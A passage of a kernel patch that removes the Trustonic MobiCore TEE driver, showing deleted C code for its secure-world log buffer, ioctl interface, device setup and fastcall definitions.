--#ifndef CONFIG_TRUSTONIC_TEE_NO_TRACES
--
--/* Supported log buffer version */
--#define MC_LOG_VERSION 2
--
--/* Default length of the log ring buffer 256KiB */
--#define LOG_BUF_ORDER 6
--
--/* Max Len of a log line for printing */
--#define LOG_LINE_SIZE 256
--
--/* Definitions for log version 2 */
--#define LOG_TYPE_MASK (0x0007)
--#define LOG_TYPE_CHAR 0
--#define LOG_TYPE_INTEGER 1
--
--/* Field length */
--#define LOG_LENGTH_MASK (0x00F8)
--#define LOG_LENGTH_SHIFT 3
--
--/* Extra attributes */
--#define LOG_EOL (0x0100)
--#define LOG_INTEGER_DECIMAL (0x0200)
--#define LOG_INTEGER_SIGNED (0x0400)
--
--struct mc_logmsg {
-- uint16_t ctrl; /* Type and format of data */
-- uint16_t source; /* Unique value for each event source */
-- uint32_t log_data; /* Value, if any */
--};
--
--/* MobiCore internal trace buffer structure. */
--struct mc_trace_buf {
-- uint32_t version; /* version of trace buffer */
-- uint32_t length; /* length of buff */
-- uint32_t head; /* last write position */
-- uint8_t buff[]; /* start of the log buffer */
--};
--
--static struct logging_ctx {
-- struct work_struct work;
-- union {
-- struct mc_trace_buf *trace_buf; /* Circular log buffer */
-- unsigned long trace_page;
-- };
-- bool buffer_is_shared; /* Log buffer cannot be freed */
-- uint32_t tail; /* MobiCore log read position */
-- uint32_t line_len; /* Log Line buffer current length */
-- int thread_err;
-- uint16_t prev_source; /* Previous Log source */
-- char line[LOG_LINE_SIZE]; /* Log Line buffer */
-- bool dead;
--} log_ctx;
--
--static inline void log_eol(uint16_t source)
--{
-- if (!strnlen(log_ctx.line, LOG_LINE_SIZE)) {
-- /* In case a TA tries to print a 0x0 */
-- log_ctx.line_len = 0;
-- return;
-- }
--
-- if (log_ctx.prev_source)
-- /* MobiCore Userspace */
-- dev_info(g_ctx.mcd, "%03x|%s\n", log_ctx.prev_source,
-- log_ctx.line);
-- else
-- /* MobiCore kernel */
-- dev_info(g_ctx.mcd, "%s\n", log_ctx.line);
--
-- log_ctx.line_len = 0;
-- log_ctx.line[0] = 0;
--}
--
--/*
-- * Collect chars in log_ctx.line buffer and output the buffer when it is full.
-- * No locking needed because only "mobicore_log" thread updates this buffer.
-- */
--static inline void log_char(char ch, uint16_t source)
--{
-- if (ch == '\n' || ch == '\r') {
-- log_eol(source);
-- return;
-- }
--
-- if ((log_ctx.line_len >= (LOG_LINE_SIZE - 1)) ||
-- (source != log_ctx.prev_source))
-- log_eol(source);
--
-- log_ctx.line[log_ctx.line_len++] = ch;
-- log_ctx.line[log_ctx.line_len] = 0;
-- log_ctx.prev_source = source;
--}
--
--static inline void log_string(uint32_t ch, uint16_t source)
--{
-- while (ch) {
-- log_char(ch & 0xFF, source);
-- ch >>= 8;
-- }
--}
--
--static inline void log_number(uint32_t format, uint32_t value, uint16_t source)
--{
-- int width = (format & LOG_LENGTH_MASK) >> LOG_LENGTH_SHIFT;
-- char fmt[16];
-- char buffer[32];
-- const char *reader = buffer;
--
-- if (format & LOG_INTEGER_DECIMAL)
-- if (format & LOG_INTEGER_SIGNED)
-- snprintf(fmt, sizeof(fmt), "%%%ud", width);
-- else
-- snprintf(fmt, sizeof(fmt), "%%%uu", width);
-- else
-- snprintf(fmt, sizeof(fmt), "%%0%ux", width);
--
-- snprintf(buffer, sizeof(buffer), fmt, value);
-- while (*reader)
-- log_char(*reader++, source);
--}
--
--static inline int log_msg(void *data)
--{
-- struct mc_logmsg *msg = (struct mc_logmsg *)data;
-- int log_type = msg->ctrl & LOG_TYPE_MASK;
--
-- switch (log_type) {
-- case LOG_TYPE_CHAR:
-- log_string(msg->log_data, msg->source);
-- break;
-- case LOG_TYPE_INTEGER:
-- log_number(msg->ctrl, msg->log_data, msg->source);
-- break;
-- }
-- if (msg->ctrl & LOG_EOL)
-- log_eol(msg->source);
--
-- return sizeof(*msg);
--}
--
--static void log_worker(struct work_struct *work)
--{
-- while (log_ctx.trace_buf->head != log_ctx.tail) {
-- if (log_ctx.trace_buf->version != MC_LOG_VERSION) {
-- dev_err(g_ctx.mcd,
-- "Bad log data v%d (exp. v%d), stop.\n",
-- log_ctx.trace_buf->version,
-- MC_LOG_VERSION);
-- log_ctx.dead = true;
-- break;
-- }
--
-- log_ctx.tail += log_msg(&log_ctx.trace_buf->buff[log_ctx.tail]);
-- /* Wrap over if no space left for a complete message */
-- if ((log_ctx.tail + sizeof(struct mc_logmsg)) >
-- log_ctx.trace_buf->length)
-- log_ctx.tail = 0;
-- }
--}
--
--/*
-- * Wake up the log reader thread
-- * This should be called from the places where calls into MobiCore have
-- * generated some logs(eg, yield, SIQ...)
-- */
--void mc_logging_run(void)
--{
-- if (!log_ctx.dead && (log_ctx.trace_buf->head != log_ctx.tail))
-- schedule_work(&log_ctx.work);
--}
--
--int mc_logging_start(void)
--{
-- int ret = mc_fc_mem_trace(virt_to_phys((void *)(log_ctx.trace_page)),
-- BIT(LOG_BUF_ORDER) * PAGE_SIZE);
--
-- if (ret) {
-- dev_err(g_ctx.mcd, "shared traces setup failed\n");
-- return ret;
-- }
--
-- log_ctx.buffer_is_shared = true;
-- dev_dbg(g_ctx.mcd, "fc_log version %u\n", log_ctx.trace_buf->version);
-- mc_logging_run();
-- return 0;
--}
--
--void mc_logging_stop(void)
--{
-- if (!mc_fc_mem_trace(0, 0))
-- log_ctx.buffer_is_shared = false;
--
-- mc_logging_run();
-- flush_work(&log_ctx.work);
--}
--
--/*
-- * Setup MobiCore kernel log. It assumes it's running on CORE 0!
-- * The fastcall will complain is that is not the case!
-- */
--int mc_logging_init(void)
--{
-- /*
-- * We are going to map this buffer into virtual address space in SWd.
-- * To reduce complexity there, we use a contiguous buffer.
-- */
-- log_ctx.trace_page = __get_free_pages(GFP_KERNEL | __GFP_ZERO,
-- LOG_BUF_ORDER);
-- if (!log_ctx.trace_page)
-- return -ENOMEM;
--
-- INIT_WORK(&log_ctx.work, log_worker);
-- return 0;
--}
--
--void mc_logging_exit(void)
--{
-- /*
-- * This is not racey as the only caller for mc_logging_run is the
-- * scheduler which gets stopped before us, and long before we exit.
-- */
-- if (!log_ctx.buffer_is_shared)
-- free_pages(log_ctx.trace_page, LOG_BUF_ORDER);
-- else
-- dev_err(g_ctx.mcd, "log buffer unregister not supported\n");
--}
--
--#endif /* !CONFIG_TRUSTONIC_TEE_NO_TRACES */
-diff --git a/drivers/gud/MobiCoreDriver/logging.h b/drivers/gud/MobiCoreDriver/logging.h
-deleted file mode 100644
-index 744b41880ea31..0000000000000
---- a/drivers/gud/MobiCoreDriver/logging.h
-+++ /dev/null
-@@ -1,51 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef _MC_LOGGING_H_
--#define _MC_LOGGING_H_
--
--#include "platform.h" /* CONFIG_TRUSTONIC_TEE_NO_TRACES */
--
--/* MobiCore internal trace log setup. */
--#ifndef CONFIG_TRUSTONIC_TEE_NO_TRACES
--void mc_logging_run(void);
--int mc_logging_init(void);
--void mc_logging_exit(void);
--int mc_logging_start(void);
--void mc_logging_stop(void);
--#else /* !CONFIG_TRUSTONIC_TEE_NO_TRACES */
--static inline void mc_logging_run(void)
--{
--}
--
--static inline long mc_logging_init(void)
--{
-- return 0;
--}
--
--static inline void mc_logging_exit(void)
--{
--}
--
--static inline int mc_logging_start(void)
--{
-- return 0;
--}
--
--static inline void mc_logging_stop(void)
--{
--}
--
--#endif /* CONFIG_TRUSTONIC_TEE_NO_TRACES */
--
--#endif /* _MC_LOGGING_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/main.c b/drivers/gud/MobiCoreDriver/main.c
-deleted file mode 100644
-index 66b232e5bc8b5..0000000000000
---- a/drivers/gud/MobiCoreDriver/main.c
-+++ /dev/null
-@@ -1,750 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#include
--
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--#include
--
--#include "public/mc_linux.h"
--
--#include "main.h"
--#include "fastcall.h"
--#include "arm.h"
--#include "mmu.h"
--#include "scheduler.h"
--#include "pm.h"
--#include "debug.h"
--#include "logging.h"
--#include "admin.h"
--#include "mcp.h"
--#include "session.h"
--#include "client.h"
--#include "api.h"
--
--#include "build_tag.h"
--
--/* Define a MobiCore device structure for use with dev_debug() etc */
--static struct device_driver driver = {
-- .name = "Trustonic"
--};
--
--static struct device device = {
-- .driver = &driver
--};
--
--struct mc_device_ctx g_ctx = {
-- .mcd = &device
--};
--
--/* device admin */
--static dev_t mc_dev_admin;
--/* device user */
--static dev_t mc_dev_user;
--
--/* Need to discover a chrdev region for the driver */
--static struct cdev mc_user_cdev;
--/* Device class for the driver assigned major */
--static struct class *mc_device_class;
--
--/*
-- * Get client object from file pointer
-- */
--static inline struct tbase_client *get_client(struct file *file)
--{
-- return (struct tbase_client *)file->private_data;
--}
--
--/*
-- * Callback for system mmap()
-- */
--static int mc_fd_user_mmap(struct file *file, struct vm_area_struct *vmarea)
--{
-- struct tbase_client *client = get_client(file);
-- uint32_t len = (uint32_t)(vmarea->vm_end - vmarea->vm_start);
--
-- /* Alloc contiguous buffer for this client */
-- return api_malloc_cbuf(client, len, NULL, vmarea);
--}
--
--/*
-- * Check r/w access to referenced memory
-- */
--static inline int ioctl_check_pointer(unsigned int cmd, int __user *uarg)
--{
-- int err = 0;
--
-- if (_IOC_DIR(cmd) & _IOC_READ)
-- err = !access_ok(VERIFY_WRITE, uarg, _IOC_SIZE(cmd));
-- else if (_IOC_DIR(cmd) & _IOC_WRITE)
-- err = !access_ok(VERIFY_READ, uarg, _IOC_SIZE(cmd));
--
-- if (err)
-- return -EFAULT;
--
-- return 0;
--}
--
--/*
-- * Callback for system ioctl()
-- * Implement most of ClientLib API functions
-- * @file pointer to file
-- * @cmd command
-- * @arg arguments
-- *
-- * Returns 0 for OK and an errno in case of error
-- */
--static long mc_fd_user_ioctl(struct file *file, unsigned int id,
-- unsigned long arg)
--{
-- struct tbase_client *client = get_client(file);
-- int __user *uarg = (int __user *)arg;
-- int ret = -EINVAL;
--
-- MCDRV_DBG("%u from %s", _IOC_NR(id), current->comm);
--
-- if (WARN(!client, "No client data available"))
-- return -EPROTO;
--
-- if (ioctl_check_pointer(id, uarg))
-- return -EFAULT;
--
-- switch (id) {
-- case MC_IO_FREEZE:
-- /* Freeze the client */
-- ret = api_freeze_device(client);
-- break;
--
-- case MC_IO_OPEN_SESSION: {
-- struct mc_ioctl_open_sess sess;
--
-- if (copy_from_user(&sess, uarg, sizeof(sess))) {
-- ret = -EFAULT;
-- break;
-- }
--
-- ret = api_open_session(client, &sess.sid, &sess.uuid, sess.tci,
-- sess.tcilen, sess.is_gp_uuid,
-- &sess.identity);
-- if (ret)
-- break;
--
-- if (copy_to_user(uarg, &sess, sizeof(sess))) {
-- ret = -EFAULT;
-- api_close_session(client, sess.sid);
-- break;
-- }
-- break;
-- }
-- case MC_IO_OPEN_TRUSTLET: {
-- struct mc_ioctl_open_trustlet ta_desc;
--
-- if (copy_from_user(&ta_desc, uarg, sizeof(ta_desc))) {
-- ret = -EFAULT;
-- break;
-- }
--
-- /* Call internal api */
-- ret = api_open_trustlet(client, &ta_desc.sid, ta_desc.spid,
-- ta_desc.buffer, ta_desc.tlen,
-- ta_desc.tci, ta_desc.tcilen);
-- if (ret)
-- break;
--
-- if (copy_to_user(uarg, &ta_desc, sizeof(ta_desc))) {
-- ret = -EFAULT;
-- api_close_session(client, ta_desc.sid);
-- break;
-- }
-- break;
-- }
-- case MC_IO_CLOSE_SESSION: {
-- uint32_t sid = (uint32_t)arg;
--
-- ret = api_close_session(client, sid);
-- break;
-- }
-- case MC_IO_NOTIFY: {
-- uint32_t sid = (uint32_t)arg;
--
-- ret = api_notify(client, sid);
-- break;
-- }
-- case MC_IO_WAIT: {
-- struct mc_ioctl_wait wait;
--
-- if (copy_from_user(&wait, uarg, sizeof(wait))) {
-- ret = -EFAULT;
-- break;
-- }
-- ret = api_wait_notification(client, wait.sid, wait.timeout);
-- break;
-- }
-- case MC_IO_MAP: {
-- struct mc_ioctl_map map;
--
-- if (copy_from_user(&map, uarg, sizeof(map))) {
-- ret = -EFAULT;
-- break;
-- }
-- ret = api_map_wsms(client, map.sid, map.bufs);
-- if (ret)
-- break;
--
-- /* Fill in return struct */
-- if (copy_to_user(uarg, &map, sizeof(map))) {
-- ret = -EFAULT;
-- api_unmap_wsms(client, map.sid, map.bufs);
-- break;
-- }
-- break;
-- }
-- case MC_IO_UNMAP: {
-- struct mc_ioctl_map map;
--
-- if (copy_from_user(&map, uarg, sizeof(map))) {
-- ret = -EFAULT;
-- break;
-- }
--
-- ret = api_unmap_wsms(client, map.sid, map.bufs);
-- break;
-- }
-- case MC_IO_ERR: {
-- struct mc_ioctl_geterr *uerr = (struct mc_ioctl_geterr *)uarg;
-- uint32_t sid;
-- int32_t exit_code;
--
-- if (get_user(sid, &uerr->sid)) {
-- ret = -EFAULT;
-- break;
-- }
--
-- ret = api_get_session_exitcode(client, sid, &exit_code);
-- if (ret)
-- break;
--
-- /* Fill in return struct */
-- if (put_user(exit_code, &uerr->value)) {
-- ret = -EFAULT;
-- break;
-- }
--
-- break;
-- }
-- case MC_IO_VERSION: {
-- struct mc_version_info version_info;
--
-- ret = mcp_get_version(&version_info);
-- if (ret)
-- break;
--
-- if (copy_to_user(uarg, &version_info, sizeof(version_info)))
-- ret = -EFAULT;
--
-- break;
-- }
-- case MC_IO_DR_VERSION: {
-- uint32_t version = MC_VERSION(MCDRVMODULEAPI_VERSION_MAJOR,
-- MCDRVMODULEAPI_VERSION_MINOR);
--
-- ret = put_user(version, uarg);
-- break;
-- }
-- default:
-- MCDRV_ERROR("unsupported cmd=0x%x", id);
-- ret = -ENOIOCTLCMD;
-- }
--
-- return ret;
--}
--
--/*
-- * Callback for system open()
-- * A set of internal client data are created and initialized.
-- *
-- * @inode
-- * @file
-- * Returns 0 if OK or -ENOMEM if no allocation was possible.
-- */
--static int mc_fd_user_open(struct inode *inode, struct file *file)
--{
-- struct tbase_client *client;
--
-- MCDRV_DBG("from %s", current->comm);
--
-- /* Create client */
-- client = api_open_device(false);
-- if (!client)
-- return -ENOMEM;
--
-- /* Store client in user file */
-- file->private_data = client;
-- return 0;
--}
--
--/*
-- * Callback for system close()
-- * The client object is freed.
-- * @inode
-- * @file
-- * Returns 0
-- */
--static int mc_fd_user_release(struct inode *inode, struct file *file)
--{
-- struct tbase_client *client = get_client(file);
--
-- MCDRV_DBG("from %s", current->comm);
--
-- if (WARN(!client, "No client data available"))
-- return -EPROTO;
--
-- /* Detach client from user file */
-- file->private_data = NULL;
--
-- /* Destroy client, including remaining sessions */
-- api_close_device(client);
-- return 0;
--}
--
--static const struct file_operations mc_user_fops = {
-- .owner = THIS_MODULE,
-- .open = mc_fd_user_open,
-- .release = mc_fd_user_release,
-- .unlocked_ioctl = mc_fd_user_ioctl,
--#ifdef CONFIG_COMPAT
-- .compat_ioctl = mc_fd_user_ioctl,
--#endif
-- .mmap = mc_fd_user_mmap,
--};
--
--int kasnprintf(struct kasnprintf_buf *buf, const char *fmt, ...)
--{
-- va_list args;
-- int max_size = buf->size - buf->off;
-- int i;
--
-- va_start(args, fmt);
-- i = vsnprintf(buf->buf + buf->off, max_size, fmt, args);
-- if (i >= max_size) {
-- int new_size = PAGE_ALIGN(buf->size + i + 1);
-- char *new_buf = krealloc(buf->buf, new_size, buf->gfp);
--
-- if (!new_buf) {
-- i = -ENOMEM;
-- } else {
-- buf->buf = new_buf;
-- buf->size = new_size;
-- max_size = buf->size - buf->off;
-- i = vsnprintf(buf->buf + buf->off, max_size, fmt, args);
-- }
-- }
--
-- if (i > 0)
-- buf->off += i;
--
-- va_end(args);
-- return i;
--}
--
--static ssize_t debug_info_read(struct file *file, char __user *user_buf,
-- size_t count, loff_t *ppos)
--{
-- /* Add/update buffer */
-- if (!file->private_data || !*ppos) {
-- struct kasnprintf_buf *buf, *old_buf;
-- int ret;
--
-- buf = kzalloc(GFP_KERNEL, sizeof(*buf));
-- if (!buf)
-- return -ENOMEM;
--
-- buf->gfp = GFP_KERNEL;
-- ret = api_info(buf);
-- if (ret < 0) {
-- kfree(buf);
-- return ret;
-- }
--
-- old_buf = file->private_data;
-- file->private_data = buf;
-- kfree(old_buf);
-- }
--
-- if (file->private_data) {
-- struct kasnprintf_buf *buf = file->private_data;
--
-- return simple_read_from_buffer(user_buf, count, ppos, buf->buf,
-- buf->off);
-- }
--
-- return 0;
--}
--
--static int debug_info_release(struct inode *inode, struct file *file)
--{
-- kfree(file->private_data);
-- return 0;
--}
--
--static const struct file_operations mc_debug_info_ops = {
-- .read = debug_info_read,
-- .llseek = default_llseek,
-- .release = debug_info_release,
--};
--
--static inline int device_admin_init(int (*tee_start_cb)(void))
--{
-- int ret = 0;
--
-- cdev_init(&mc_user_cdev, &mc_user_fops);
--
-- mc_device_class = class_create(THIS_MODULE, "trustonic_tee");
-- if (IS_ERR(mc_device_class)) {
-- MCDRV_ERROR("failed to create device class");
-- return PTR_ERR(mc_device_class);
-- }
--
-- /* Create the ADMIN node */
-- ret = mc_admin_init(mc_device_class, &mc_dev_admin, tee_start_cb);
-- if (ret < 0) {
-- MCDRV_ERROR("failed to init mobicore device");
-- class_destroy(mc_device_class);
-- return ret;
-- }
-- return 0;
--}
--
--static inline int device_user_init(void)
--{
-- int ret = 0;
-- struct device *dev;
--
-- mc_dev_user = MKDEV(MAJOR(mc_dev_admin), 1);
-- /* Create the user node */
-- ret = cdev_add(&mc_user_cdev, mc_dev_user, 1);
-- if (ret) {
-- MCDRV_ERROR("user device register failed");
-- goto err_cdev_add;
-- }
-- mc_user_cdev.owner = THIS_MODULE;
-- dev = device_create(mc_device_class, NULL, mc_dev_user, NULL,
-- MC_USER_DEVNODE);
-- if (IS_ERR(dev)) {
-- ret = PTR_ERR(dev);
-- goto err_device_create;
-- }
--
-- /* Create debugfs info entry */
-- debugfs_create_file("info", 0400, g_ctx.debug_dir, NULL,
-- &mc_debug_info_ops);
--
-- return 0;
--
--err_device_create:
-- cdev_del(&mc_user_cdev);
--err_cdev_add:
-- mc_admin_exit(mc_device_class);
-- class_destroy(mc_device_class);
-- MCDRV_DBG("failed with %d", ret);
-- return ret;
--}
--
--static void devices_exit(void)
--{
-- device_destroy(mc_device_class, mc_dev_user);
-- cdev_del(&mc_user_cdev);
-- mc_admin_exit(mc_device_class);
-- class_destroy(mc_device_class);
--}
--
--static inline int mobicore_start(void)
--{
-- int ret;
-- struct mc_version_info version_info;
--
-- ret = mcp_start();
-- if (ret) {
-- MCDRV_ERROR("TEE start failed");
-- goto err_mcp;
-- }
--
-- ret = mc_logging_start();
-- if (ret) {
-- MCDRV_ERROR("Log start failed");
-- goto err_log;
-- }
--
-- ret = mc_scheduler_start();
-- if (ret) {
-- MCDRV_ERROR("Scheduler start failed");
-- goto err_sched;
-- }
--
-- ret = mc_pm_start();
-- if (ret) {
-- MCDRV_ERROR("Power Management start failed");
-- goto err_pm;
-- }
--
-- ret = mcp_get_version(&version_info);
-- if (ret)
-- goto err_mcp_cmd;
--
-- MCDRV_DBG("\n"
-- " product_id = %s\n"
-- " version_so = 0x%x\n"
-- " version_mci = 0x%x\n"
-- " version_mclf = 0x%x\n"
-- " version_container = 0x%x\n"
-- " version_mc_config = 0x%x\n"
-- " version_tl_api = 0x%x\n"
-- " version_dr_api = 0x%x\n"
-- " version_cmp = 0x%x\n",
-- version_info.product_id,
-- version_info.version_mci,
-- version_info.version_so,
-- version_info.version_mclf,
-- version_info.version_container,
-- version_info.version_mc_config,
-- version_info.version_tl_api,
-- version_info.version_dr_api,
-- version_info.version_cmp);
--
-- if (MC_VERSION_MAJOR(version_info.version_mci) > 1) {
-- pr_err("MCI version %d.%d is too recent for this driver",
-- MC_VERSION_MAJOR(version_info.version_mci),
-- MC_VERSION_MINOR(version_info.version_mci));
-- goto err_version;
-- }
--
-- if ((MC_VERSION_MAJOR(version_info.version_mci) == 0) &&
-- (MC_VERSION_MINOR(version_info.version_mci) < 6)) {
-- pr_err("MCI version %d.%d is too old for this driver",
-- MC_VERSION_MAJOR(version_info.version_mci),
-- MC_VERSION_MINOR(version_info.version_mci));
-- goto err_version;
-- }
--
-- dev_info(g_ctx.mcd, "MobiCore MCI version is %d.%d\n",
-- MC_VERSION_MAJOR(version_info.version_mci),
-- MC_VERSION_MINOR(version_info.version_mci));
--
-- /* Determine which features are supported */
-- switch (version_info.version_mci) {
-- case MC_VERSION(1, 2): /* 310 */
-- g_ctx.f_client_login = true;
-- /* Fall through */
-- case MC_VERSION(1, 1):
-- g_ctx.f_multimap = true;
-- /* Fall through */
-- case MC_VERSION(1, 0): /* 302 */
-- g_ctx.f_mem_ext = true;
-- g_ctx.f_ta_auth = true;
-- /* Fall through */
-- case MC_VERSION(0, 7):
-- g_ctx.f_timeout = true;
-- /* Fall through */
-- case MC_VERSION(0, 6): /* 301 */
-- break;
-- }
--
-- ret = device_user_init();
-- if (ret)
-- goto err_create_dev_user;
--
-- return 0;
--
--err_create_dev_user:
--err_version:
--err_mcp_cmd:
-- mc_pm_stop();
--err_pm:
-- mc_scheduler_stop();
--err_sched:
-- mc_logging_stop();
--err_log:
-- mcp_stop();
--err_mcp:
-- return ret;
--}
--
--static inline void mobicore_stop(void)
--{
-- mc_pm_stop();
-- mc_scheduler_stop();
-- mc_logging_stop();
-- mcp_stop();
--}
--
--/*
-- * This function is called by the kernel during startup or by a insmod command.
-- * This device is installed and registered as cdev, then interrupt and
-- * queue handling is set up
-- */
--static int mobicore_init(void)
--{
-- int err = 0;
--
-- dev_set_name(g_ctx.mcd, "TEE");
--
-- /* Do not remove or change the following trace.
-- * The string "MobiCore" is used to detect if Cannot continue! */
-- if (!has_security_extensions()) {
-- MCDRV_ERROR("Hardware doesn't support ARM TrustZone!");
-- return -ENODEV;
-- }
--
-- /* Running in secure mode -> Cannot load the driver! */
-- if (is_secure_mode()) {
-- MCDRV_ERROR("Running in secure MODE!");
-- return -ENODEV;
-- }
--
-- /* Init common API layer */
-- api_init();
--
-- /* Init plenty of nice features */
-- err = mc_fastcall_init();
-- if (err) {
-- MCDRV_ERROR("Fastcall support init failed!");
-- goto fail_fastcall_init;
-- }
--
-- err = mcp_init();
-- if (err) {
-- MCDRV_ERROR("MCP init failed!");
-- goto fail_mcp_init;
-- }
--
-- err = mc_logging_init();
-- if (err) {
-- MCDRV_ERROR("Log init failed!");
-- goto fail_log_init;
-- }
--
-- /* The scheduler is the first to create a debugfs entry */
-- g_ctx.debug_dir = debugfs_create_dir("trustonic_tee", NULL);
-- err = mc_scheduler_init();
-- if (err) {
-- MCDRV_ERROR("Scheduler init failed!");
-- goto fail_mc_device_sched_init;
-- }
--
-- /*
-- * Create admin dev so that daemon can already communicate with
-- * the driver
-- */
-- err = device_admin_init(mobicore_start);
-- if (err)
-- goto fail_creat_dev_admin;
--
-- return 0;
--
--fail_creat_dev_admin:
-- mc_scheduler_exit();
--fail_mc_device_sched_init:
-- debugfs_remove(g_ctx.debug_dir);
-- mc_logging_exit();
--fail_log_init:
-- mcp_exit();
--fail_mcp_init:
-- mc_fastcall_exit();
--fail_fastcall_init:
-- return err;
--}
--
--/*
-- * This function removes this device driver from the Linux device manager .
-- */
--static void mobicore_exit(void)
--{
-- MCDRV_DBG("enter");
--
-- devices_exit();
-- mobicore_stop();
-- mc_scheduler_exit();
-- mc_logging_exit();
-- mcp_exit();
-- mc_fastcall_exit();
-- debugfs_remove_recursive(g_ctx.debug_dir);
--
-- MCDRV_DBG("exit");
--}
--
--/* Linux Driver Module Macros */
--
--#ifdef MC_DEVICE_PROPNAME
--
--static int mobicore_probe(struct platform_device *pdev)
--{
-- g_ctx.mcd->of_node = pdev->dev.of_node;
-- mobicore_init();
-- return 0;
--}
--
--static const struct of_device_id of_match_table[] = {
-- { .compatible = MC_DEVICE_PROPNAME },
-- { }
--};
--
--static struct platform_driver mc_plat_driver = {
-- .probe = mobicore_probe,
-- .driver = {
-- .name = "mcd",
-- .owner = THIS_MODULE,
-- .of_match_table = of_match_table,
-- }
--};
--
--static int mobicore_register(void)
--{
-- return platform_driver_register(&mc_plat_driver);
--}
--
--static void mobicore_unregister(void)
--{
-- platform_driver_unregister(&mc_plat_driver);
-- mobicore_exit();
--}
--
--module_init(mobicore_register);
--module_exit(mobicore_unregister);
--
--#else /* MC_DEVICE_PROPNAME */
--
--module_init(mobicore_init);
--module_exit(mobicore_exit);
--
--#endif /* !MC_DEVICE_PROPNAME */
--
--MODULE_AUTHOR("Trustonic Limited");
--MODULE_LICENSE("GPL v2");
--MODULE_DESCRIPTION("MobiCore driver");
-diff --git a/drivers/gud/MobiCoreDriver/main.h b/drivers/gud/MobiCoreDriver/main.h
-deleted file mode 100644
-index cadc3d766147a..0000000000000
---- a/drivers/gud/MobiCoreDriver/main.h
-+++ /dev/null
-@@ -1,60 +0,0 @@
--/*
-- * Copyright (c) 2013-2015 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--
--#ifndef _MC_MAIN_H_
--#define _MC_MAIN_H_
--
--#include /* gfp_t */
--
--#define MC_VERSION(major, minor) \
-- (((major & 0x0000ffff) << 16) | (minor & 0x0000ffff))
--#define MC_VERSION_MAJOR(x) ((x) >> 16)
--#define MC_VERSION_MINOR(x) ((x) & 0xffff)
--
--/* MobiCore Driver Kernel Module context data. */
--struct mc_device_ctx {
-- struct device *mcd;
-- /* debugfs root */
-- struct dentry *debug_dir;
--
-- /* GP sessions waiting final close notif */
-- struct list_head closing_sess;
-- struct mutex closing_lock; /* Closing sessions list */
--
-- /* Features */
-- /* - SWd can set a time out to get scheduled at a future time */
-- bool f_timeout;
-- /* - SWd supports memory extension which allows for bigger TAs */
-- bool f_mem_ext;
-- /* - SWd supports TA authorisation */
-- bool f_ta_auth;
-- /* - SWd can map several buffers at once */
-- bool f_multimap;
-- /* - SWd supports GP client authentication */
-- bool f_client_login;
--};
--
--extern struct mc_device_ctx g_ctx;
--
--struct kasnprintf_buf {
-- gfp_t gfp;
-- void *buf;
-- int size;
-- int off;
--};
--
--extern __printf(2, 3)
--int kasnprintf(struct kasnprintf_buf *buf, const char *fmt, ...);
--
--#endif /* _MC_MAIN_H_ */
-diff --git a/drivers/gud/MobiCoreDriver/mci/mcifc.h b/drivers/gud/MobiCoreDriver/mci/mcifc.h
-deleted file mode 100644
-index 4848c9e047fba..0000000000000
---- a/drivers/gud/MobiCoreDriver/mci/mcifc.h
-+++ /dev/null
-@@ -1,144 +0,0 @@
--/*
-- * Copyright (c) 2013-2014 TRUSTONIC LIMITED
-- * All Rights Reserved.
-- *
-- * This program is free software; you can redistribute it and/or
-- * modify it under the terms of the GNU General Public License
-- * version 2 as published by the Free Software Foundation.
-- *
-- * This program is distributed in the hope that it will be useful,
-- * but WITHOUT ANY WARRANTY; without even the implied warranty of
-- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-- * GNU General Public License for more details.
-- */
--#ifndef MCIFC_H_
--#define MCIFC_H_
--
--#include "platform.h"
--
--/** @name MobiCore FastCall Defines
-- * Defines for the two different FastCall's.
-- */
--/** @{ */
--
--#include "platform.h"
--
--/* --- global ---- */
--#define MC_FC_INVALID ((uint32_t)0) /**< Invalid FastCall ID */
--
--#if defined(CONFIG_ARM64) && !defined(MC_ARMV7_FC)
--
--/* These should be handled as 64-bit FCs; now they are more like 32bits... */
--#define MC_FC_STD64_BASE ((uint32_t)0xFF000000)
--#define MC_FC_STD64(x) ((uint32_t)(MC_FC_STD64_BASE + (x)))
--
--#define MC_FC_INIT MC_FC_STD64(1) /**< Initializing FastCall. */
--#define MC_FC_INFO MC_FC_STD64(2) /**< Info FastCall. */
--#define MC_FC_MEM_TRACE MC_FC_STD64(10) /**< Enable SWd tracing via memory */
--#define MC_FC_SWAP_CPU MC_FC_STD64(54) /**< Change new active Core */
--
--#else
--
--#define MC_FC_INIT ((uint32_t)(-1)) /**< Initializing FastCall. */
--#define MC_FC_INFO ((uint32_t)(-2)) /**< Info FastCall. */
--#define MC_FC_MEM_TRACE ((uint32_t)(-31)) /**< Enable SWd tracing via memory */
--#define MC_FC_SWAP_CPU ((uint32_t)(0x84000005)) /**< Change new active Core */
--
--#endif
--
--/** @} */
--
--/** @name MobiCore SMC Defines
-- * Defines the different secure monitor calls (SMC) for world switching.
-- * @{ */
--/**< Yield to switch from NWd to SWd. */
--#define MC_SMC_N_YIELD 3
--/**< SIQ to switch from NWd to SWd. */
--#define MC_SMC_N_SIQ 4
--/** @} */
--
--/** @name MobiCore status
